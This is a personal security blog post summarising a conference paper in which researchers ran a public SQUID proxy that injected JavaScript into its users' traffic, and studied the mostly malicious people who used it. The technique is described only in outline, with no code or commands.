JavaScript and Botnets

After an entire period of time busy in traveling and moving to a new city I am finally back on my blog. Not sure abut the frequency of my future posts but still very interested on keeping on posting my working topic ;). Probably I’ll be able to post a little bit more from now… Most of you are already aware about the DevCon 2012 and its new topics on security, so I won’t spend time on this discussion, but I do want pointing out an interesting technical paper presented by Chema Alonso and Manu “The Sur” titled :” Owing Bad Guys {& Mafia} with JavaScript Botnets”.

The paper describes how attackers, by exploiting TOR networks and public available proxies, can intercept user’s traffic, and injecting malicious JavaScript to exploit users’ browsers. The technique per-se is well known from years and the framework they used to load malicious payloads (BeeF) is already widely used around the hacking community. So what’s so interesting about this paper if it does not introduce any new concept? I found really interesting the analysis on the users they had. in other words who is using public available proxies and TOR networks.

Let’s take a deeper view of it. The following image shows the general idea about the implemented attack on a proxy server (BTW they setup a SQUID proxy and the registered it on public proxy registries).

SQUID server has the property to modify traffic following specific roles. Originally these roles have been designed for parent control and for blocking some specific domains, but it can be used under a malicious perspective to inject malicious JavaScript on downloads pages. The authors used a poison script to inject malicious JavaScript. Following the infection:

Again I don’t see any interesting technique in this. BUT I do see the beauty of this study in capturing the “stakeholders”. If you follow on reading the paper, authors show who used this proxy and what he did with it. Obviously most of the performed operations by exploiting the free (and hacked) proxy were with malicious intents. One of the most interesting proves that authors provided is about Scam and people who answered back by giving personal informations.

Most of the stakeholders come from Ex-URS, Brasil and USA. Many of them from Cina, only few of them from Europe. Beside normal stats on where users come from, understandings how malicious hackers use proxies to attack is really interesting. Another little but significative theoric brick could be added to all the knowledge we had from honey-net project.